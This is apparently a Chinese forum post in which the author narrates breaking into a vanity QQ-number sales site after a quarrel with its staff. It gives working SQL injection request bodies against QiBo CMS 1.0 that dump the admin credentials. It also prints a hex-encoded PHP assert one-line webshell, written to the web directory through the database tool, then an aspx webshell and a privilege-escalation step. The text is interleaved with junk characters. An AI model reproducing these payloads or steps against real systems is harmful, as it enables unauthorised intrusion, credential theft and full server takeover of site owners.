|
$ w' U+ [: R. d" O6 D
2 n" X! V& M' e0 L2 [; d# \
6 q- `/ l2 j: _0 G
( P8 K4 I h2 a/ o3 o 一、踩点寻找漏洞
+ H! b: j; l# q. h8 g7 ^0 u/ I( n
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
: C7 q, Q- H0 D# U随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
' i) Y9 t' j6 A+ i/ ~5 v
先注册一个用户,记住注册时候的邮箱以uid号,
& t6 f' t5 n9 p$ {
: f$ n$ p: w* L. R8 |& C5 D
! l/ M* ]" q3 ^4 F然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
/ J* D, p, s7 Y+ q! X$ Z
$ S+ l, M, X% @
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
( k8 J' ^: }6 v
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
2 ^% ~ B6 k7 C8 x8 u" \3 H* l
4 T0 \6 j1 {4 r. M6 Q) Z3 S* ~确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
. p, v5 j# l) B% }3 n# x
\# v, w% Y1 O5 q3 n ^' l4 m. a+ |: k
$ Y$ `% C$ F# k- R5 r解密进后台如图:
5 I( F& T2 ?# F9 S
: W1 V& h% @+ P3 F# u
0 z5 C/ G/ ~. `7 V# l/ O8 ?7 A# U2 J
q z$ B' ~, a8 \0 V7 {二、后台getwebshell
* p! }* a- C. z& t: k7 G4 L0 Z- ]进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
+ w$ ?9 o. ~ ~) C
+ h8 W9 M, |2 ]! N' o$ x! S
; ]- X- ]; n5 r$ b$ f
' i9 x4 R: u, u" Y: H, m. U然后点确定,添加提示
. D W+ L0 @* V# Z7 K, u
) |8 A2 b( q, {6 l0 n! }
* s7 h, G& r8 E
6 X5 i# @* ~3 Z1 e) G9 D+ j由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
! l( C& P# g# f3 K
' @; o0 W2 f/ w6 L5 s( O
h7 G! O1 ?6 U
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
1 t( g) L* J4 p* f
如图:
1 @( ~# u# V3 D
! z' ?1 ]/ W& H% K
7 ?' c% y5 e8 m# j3 W$ D
% N! F5 j; [* A( ^0 t4 ]9 ]& _) D
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
/ L- {! Z% F. o4 M& f* D
) Y) a8 S& p+ E& y+ w. \, a1 N
, D/ T0 V. r% t5 A
W+ F5 e! V0 G/ N/ Y" q三、提权进服务器
' j: Z. Z$ C: _经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
# T% r: K3 ?) ?/ z" D8 L) `
; t! y, a, B, [( x. p
$ l/ O5 V3 O7 r7 R7 u5 j
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
6 F7 P& F5 e) a6 |
0 n" Z& G$ Z4 w" _$ Z% \
+ n2 y, x% k" ?+ ^ N/ y然后登陆服务器如图:
$ T+ ~6 x1 i1 v' r! \) N
5 l2 N% p6 ^" N9 b, ^* e" B0 u3 z( m
( ]2 S* Y0 G0 P8 N) N
( W* ]3 O) s. p; G `
2 N* \% F' I) V$ v& v+ O
2 `- y. W4 ?' P4 l
难怪普通刀连接不上,原来是有狗。
8 a+ A7 D- Q2 u, d
$ M$ l- K ^; H8 s
- I' y7 o: u1 `7 t! z' O; W% ^
7 F# G" n( Q+ _ ' O& Q$ j( O! ]: ~ Z1 N
; \9 i- F( H: B a
/ S/ G, e1 U% X3 ~+ R9 z
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对